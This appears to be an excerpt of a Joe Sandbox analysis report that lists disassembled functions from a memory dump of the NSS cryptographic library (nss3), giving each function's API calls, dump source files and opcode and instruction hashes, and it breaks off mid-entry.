Part of subcall function 6C56CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C56CF16

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C58AB3E,?,?,?), ref: 6C58AC55

Part of subcall function 6C5A10C0: TlsGetValue.KERNEL32(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A10F3
Part of subcall function 6C5A10C0: EnterCriticalSection.KERNEL32(?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A110C
Part of subcall function 6C5A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A1141
Part of subcall function 6C5A10C0: PR_Unlock.NSS3(?,?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A1182
Part of subcall function 6C5A10C0: TlsGetValue.KERNEL32(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A119C

PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C58AB3E,?,?), ref: 6C58AC70

Part of subcall function 6C56E300: TlsGetValue.KERNEL32 ref: 6C56E33C
Part of subcall function 6C56E300: EnterCriticalSection.KERNEL32(?), ref: 6C56E350
Part of subcall function 6C56E300: PR_Unlock.NSS3(?), ref: 6C56E5BC
Part of subcall function 6C56E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C56E5CA
Part of subcall function 6C56E300: TlsGetValue.KERNEL32 ref: 6C56E5F2
Part of subcall function 6C56E300: EnterCriticalSection.KERNEL32(?), ref: 6C56E606
Part of subcall function 6C56E300: PORT_Alloc_Util.NSS3(?), ref: 6C56E613

PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C58AC92
PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C58AB3E), ref: 6C58ACD7
PORT_Alloc_Util.NSS3(?), ref: 6C58AD10
memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C58AD2B

Part of subcall function 6C56F360: TlsGetValue.KERNEL32(00000000,?,6C58A904,?), ref: 6C56F38B
Part of subcall function 6C56F360: EnterCriticalSection.KERNEL32(?,?,?,6C58A904,?), ref: 6C56F3A0
Part of subcall function 6C56F360: PR_Unlock.NSS3(?,?,?,?,6C58A904,?), ref: 6C56F3D3

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
String ID:
API String ID: 2926855110-0
Opcode ID: 7e7b0928f46b139c63c502dc02d4de4d4b757ed150e71ccf0bc8f429cf716091
Instruction ID: 324efc3efeeb9f2a7165b6035e598c92bb59784278cd0f66c569291a5818de44
Opcode Fuzzy Hash: 7e7b0928f46b139c63c502dc02d4de4d4b757ed150e71ccf0bc8f429cf716091
Instruction Fuzzy Hash: D13127B1E016159FEB00CF69CC419BF77B6AFD4328B188128E8159BB80EB31EC1587A1

Function 6C568C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6C568C7C

Part of subcall function 6C609DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C650A27), ref: 6C609DC6
Part of subcall function 6C609DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C650A27), ref: 6C609DD1
Part of subcall function 6C609DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C609DED

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C568CB0
TlsGetValue.KERNEL32 ref: 6C568CD1
EnterCriticalSection.KERNEL32(?), ref: 6C568CE5
PR_Unlock.NSS3(?), ref: 6C568D2E
PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C568D62
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C568D93

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
String ID:
API String ID: 3131193014-0
Opcode ID: 74a058b9acf2f096f38d3931a61aeb3a7693292bf3128eb8ca3f4a0b4b491725
Instruction ID: a652882a5eb9a374870b00e29f3a469ce7842a34f60d484be802bdd54c2868bc
Opcode Fuzzy Hash: 74a058b9acf2f096f38d3931a61aeb3a7693292bf3128eb8ca3f4a0b4b491725
Instruction Fuzzy Hash: 6F314871E00601AFEB009F6ADC447AA77B0BF56318F140136EA1A67FA0D770B924C7D2

Function 6C5A9D60 Relevance: 10.6, APIs: 7, Instructions: 108memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6C5A9C5B), ref: 6C5A9D82

Part of subcall function 6C5A14C0: TlsGetValue.KERNEL32 ref: 6C5A14E0
Part of subcall function 6C5A14C0: EnterCriticalSection.KERNEL32 ref: 6C5A14F5
Part of subcall function 6C5A14C0: PR_Unlock.NSS3 ref: 6C5A150D

PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6C5A9C5B), ref: 6C5A9DA9

Part of subcall function 6C5A1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C54895A,00000000,?,00000000,?,00000000,?,00000000,?,6C53F599,?,00000000), ref: 6C5A136A
Part of subcall function 6C5A1340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C54895A,00000000,?,00000000,?,00000000,?,00000000,?,6C53F599,?,00000000), ref: 6C5A137E
Part of subcall function 6C5A1340: PL_ArenaGrow.NSS3(?,6C53F599,?,00000000,?,6C54895A,00000000,?,00000000,?,00000000,?,00000000,?,6C53F599,?), ref: 6C5A13CF
Part of subcall function 6C5A1340: PR_Unlock.NSS3(?,?,6C54895A,00000000,?,00000000,?,00000000,?,00000000,?,6C53F599,?,00000000), ref: 6C5A145C

PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6C5A9C5B), ref: 6C5A9DCE

Part of subcall function 6C5A1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C54895A,00000000,?,00000000,?,00000000,?,00000000,?,6C53F599,?,00000000), ref: 6C5A13F0
Part of subcall function 6C5A1340: PL_ArenaGrow.NSS3(?,6C53F599,?,?,?,00000000,00000000,?,6C54895A,00000000,?,00000000,?,00000000,?,00000000), ref: 6C5A1445

PORT_ArenaAlloc_Util.NSS3(?,00000008,6C5A9C5B), ref: 6C5A9DDC
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,6C5A9C5B), ref: 6C5A9DFE
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6C5A9C5B), ref: 6C5A9E43
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,6C5A9C5B), ref: 6C5A9E91

Part of subcall function 6C5EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5EC2BF

Part of subcall function 6C5A1560: TlsGetValue.KERNEL32(00000000,00000000,?,?,?,6C59FAAB,00000000), ref: 6C5A157E
Part of subcall function 6C5A1560: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C59FAAB,00000000), ref: 6C5A1592
Part of subcall function 6C5A1560: memset.VCRUNTIME140(?,00000000,?), ref: 6C5A1600
Part of subcall function 6C5A1560: PL_ArenaRelease.NSS3(?,?), ref: 6C5A1620
Part of subcall function 6C5A1560: PR_Unlock.NSS3(?), ref: 6C5A1639

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Arena$Util$Value$Alloc_CriticalEnterSectionUnlock$GrowGrow_$ErrorMark_Releasememset
String ID:
API String ID: 3425318038-0
Opcode ID: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
Instruction ID: 3e8bb2e01bb0c08e8803e89bbe4ce40cf326915a392b21f3a1866b5317cca0e0
Opcode Fuzzy Hash: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
Instruction Fuzzy Hash: 17416CB4601606EFE7409F56DC40B9ABBA1BF45348F148128D9188BFA1EB73E835CB90

Function 6C56DDD0 Relevance: 10.6, APIs: 7, Instructions: 106COMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C56DDEC

Part of subcall function 6C5A0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C5A08B4

PK11_DigestBegin.NSS3(00000000), ref: 6C56DE70
PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6C56DE83
HASH_ResultLenByOidTag.NSS3(?), ref: 6C56DE95
PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6C56DEAE
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C56DEBB
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C56DECC

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: K11_$Digest$Error$BeginContextDestroyFinalFindResultTag_Util
String ID:
API String ID: 1091488953-0
Opcode ID: c25e9be10756acc736ba5598b1f4ab995820f4ee77cb5acb86913c18f61d3f5b
Instruction ID: 01aa33dce37a685ea2f1127ac4e5ef319afd67b3fc33147be89b11cc9b5b2128
Opcode Fuzzy Hash: c25e9be10756acc736ba5598b1f4ab995820f4ee77cb5acb86913c18f61d3f5b
Instruction Fuzzy Hash: 8131E9B2D00215ABDB00AF66AC40BBB76B89F95608F150535ED09A7B11F731DD18C7E2

Function 6C547E30 Relevance: 10.6, APIs: 7, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C547E48

Part of subcall function 6C5A0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5487ED,00000800,6C53EF74,00000000), ref: 6C5A1000
Part of subcall function 6C5A0FF0: PR_NewLock.NSS3(?,00000800,6C53EF74,00000000), ref: 6C5A1016
Part of subcall function 6C5A0FF0: PL_InitArenaPool.NSS3(00000000,security,6C5487ED,00000008,?,00000800,6C53EF74,00000000), ref: 6C5A102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000008), ref: 6C547E5B

Part of subcall function 6C5A10C0: TlsGetValue.KERNEL32(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A10F3
Part of subcall function 6C5A10C0: EnterCriticalSection.KERNEL32(?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A110C
Part of subcall function 6C5A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A1141
Part of subcall function 6C5A10C0: PR_Unlock.NSS3(?,?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A1182
Part of subcall function 6C5A10C0: TlsGetValue.KERNEL32(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A119C

SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C547E7B

Part of subcall function 6C59FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C598D2D,?,00000000,?), ref: 6C59FB85
Part of subcall function 6C59FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C59FBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C66925C,?), ref: 6C547E92

Part of subcall function 6C59B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6718D0,?), ref: 6C59B095

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C547EA1
SECOID_FindOID_Util.NSS3(00000004), ref: 6C547ED1
SECOID_FindOID_Util.NSS3(00000004), ref: 6C547EFA

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_FindItem_Value$AllocateCopyCriticalDecodeEnterErrorFreeInitLockPoolQuickSectionUnlockcallocmemcpy
String ID:
API String ID: 3989529743-0
Opcode ID: b6bd1ab1420c425b2f173ccc3ef3401ac92ac60a93a8bb16834a4c58213bbb66
Instruction ID: 098fa92d2fef4aff4f6777486b18c90f8c90611eb94db3b6dffe16a029a580ea
Opcode Fuzzy Hash: b6bd1ab1420c425b2f173ccc3ef3401ac92ac60a93a8bb16834a4c58213bbb66
Instruction Fuzzy Hash: 7731A1B2A002119BEB10DBB59C40F5B77E8AF84798F158924DD16EBB01E730EC14C7A0

Function 6C59DC10 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000,?,?,00000000,?,?,6C59D9E4,00000000), ref: 6C59DC30
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,00000000,?,?,6C59D9E4,00000000), ref: 6C59DC4E
PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,?,6C59D9E4,00000000), ref: 6C59DC5A
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C59DC7E
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C59DCAD

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Alloc_Util$Arenamemcpy
String ID:
API String ID: 2632744278-0
Opcode ID: d28c590b9cf228dd538a3fbf1fb97dd9b8d626aa23fd87c456d957bb8d7f5067
Instruction ID: f2a63598fb490ed03156577136cff00392f40b075071d33186ecebff9aa9a3b4
Opcode Fuzzy Hash: d28c590b9cf228dd538a3fbf1fb97dd9b8d626aa23fd87c456d957bb8d7f5067
Instruction Fuzzy Hash: B3317EB5A00241DFD710CF5DDC84B56B7F8AF65358F248469E948CBB01E772E944CBA1

Function 6C562E40 Relevance: 10.6, APIs: 7, Instructions: 92COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6C55E728,?,00000038,?,?,00000000), ref: 6C562E52
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C562E66
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C562E7B
EnterCriticalSection.KERNEL32(00000000), ref: 6C562E8F
PL_HashTableLookup.NSS3(?,?), ref: 6C562E9E
PR_Unlock.NSS3(?), ref: 6C562EAB
PR_Unlock.NSS3(?), ref: 6C562F0D

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$HashLookupTable
String ID:
API String ID: 3106257965-0
Opcode ID: 04c7a210133060dea69ce9bcc05002ecabf9766993ccc39a3bb45f1d50392e78
Instruction ID: a0126e31f2be3292c708aaeb3eac333c380fbc6eefb5c5142d4dead81eab2425
Opcode Fuzzy Hash: 04c7a210133060dea69ce9bcc05002ecabf9766993ccc39a3bb45f1d50392e78
Instruction Fuzzy Hash: C331E476A00105EBEB009F2ADC8587AB775EF85258B448575EC08C7B21EB31EC64C7D1

Function 6C581EA0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE002,00000000,?,00000001,?,S&Xl,6C566295,?,00000000,?,00000001,S&Xl,?), ref: 6C581ECB

Part of subcall function 6C5EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5EC2BF

TlsGetValue.KERNEL32(?,00000001,?,S&Xl,6C566295,?,00000000,?,00000001,S&Xl,?), ref: 6C581EF1
EnterCriticalSection.KERNEL32(?), ref: 6C581F01
PR_SetError.NSS3(00000000,00000000), ref: 6C581F39

Part of subcall function 6C58FE20: TlsGetValue.KERNEL32(6C565ADC,?,00000000,00000001,?,?,00000000,?,6C55BA55,?,?), ref: 6C58FE4B
Part of subcall function 6C58FE20: EnterCriticalSection.KERNEL32(78831D90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C58FE5F

PR_Unlock.NSS3(?), ref: 6C581F67

Strings

S&Xl, xrefs: 6C581EA0

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Value$CriticalEnterErrorSection$Unlock
String ID: S&Xl
API String ID: 704537481-4066033453
Opcode ID: cf33987904ae31e239c148ab46cd50cd54923785dd95b6a43b5bfd3218ab30c8
Instruction ID: ec5946ada30ff506ade69074cb79de492e3d636eca2589af7f51547854b96e1d
Opcode Fuzzy Hash: cf33987904ae31e239c148ab46cd50cd54923785dd95b6a43b5bfd3218ab30c8
Instruction Fuzzy Hash: AE21E671A01224ABDB00DF2AEC85E9B3B69AF85368F144565FD2887B11E730ED54C7F1

Function 6C5ACEE0 Relevance: 10.6, APIs: 7, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,6C5ACD93,?), ref: 6C5ACEEE

Part of subcall function 6C5A14C0: TlsGetValue.KERNEL32 ref: 6C5A14E0
Part of subcall function 6C5A14C0: EnterCriticalSection.KERNEL32 ref: 6C5A14F5
Part of subcall function 6C5A14C0: PR_Unlock.NSS3 ref: 6C5A150D

PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C5ACD93,?), ref: 6C5ACEFC

Part of subcall function 6C5A10C0: TlsGetValue.KERNEL32(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A10F3
Part of subcall function 6C5A10C0: EnterCriticalSection.KERNEL32(?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A110C
Part of subcall function 6C5A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A1141
Part of subcall function 6C5A10C0: PR_Unlock.NSS3(?,?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A1182
Part of subcall function 6C5A10C0: TlsGetValue.KERNEL32(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A119C

SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C5ACD93,?), ref: 6C5ACF0B

Part of subcall function 6C5A0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C5A08B4

SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C5ACD93,?), ref: 6C5ACF1D

Part of subcall function 6C59FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C598D2D,?,00000000,?), ref: 6C59FB85
Part of subcall function 6C59FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C59FBB1

PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C5ACD93,?), ref: 6C5ACF47
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C5ACD93,?), ref: 6C5ACF67
SECITEM_CopyItem_Util.NSS3(?,00000000,6C5ACD93,?,?,?,?,?,?,?,?,?,?,?,6C5ACD93,?), ref: 6C5ACF78

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
String ID:
API String ID: 4291907967-0
Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction ID: 78e96db5a8a1a3d8e139a29179bc62f334ca49cb853891b31fddc55f6dd66f1b
Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction Fuzzy Hash: 5711A2B5A002059BEB00ABEB6C41B6FB6EC9F9854DF044139ED0AD7741FB61ED09C6B1

Function 6C558C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C558C1B
EnterCriticalSection.KERNEL32 ref: 6C558C34
PL_ArenaAllocate.NSS3 ref: 6C558C65
PR_Unlock.NSS3 ref: 6C558C9C
PR_Unlock.NSS3 ref: 6C558CB6

Part of subcall function 6C5EDD70: TlsGetValue.KERNEL32 ref: 6C5EDD8C
Part of subcall function 6C5EDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C5EDDB4

Strings

KRAM, xrefs: 6C558C8F

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
String ID: KRAM
API String ID: 4127063985-3815160215
Opcode ID: c3cd28a7cf5496d6bd2be92f26ee0deef2686b1c0ab7558eb0f7012ef8c5157c
Instruction ID: aa425983f45058a4db19b97ee1e05cb6de16eb412b2e82955be040da9beedacd
Opcode Fuzzy Hash: c3cd28a7cf5496d6bd2be92f26ee0deef2686b1c0ab7558eb0f7012ef8c5157c
Instruction Fuzzy Hash: 7D217CB1A15A01CFD700AF79C884569BBF4FF55304F45896BD888CB711EB35D89ACB82

Function 6C568E80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,?,6C582E62,?,?,?,?,?,?,?,00000000,?,?,?,6C554F1C), ref: 6C568EA2

Part of subcall function 6C58F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C58F854
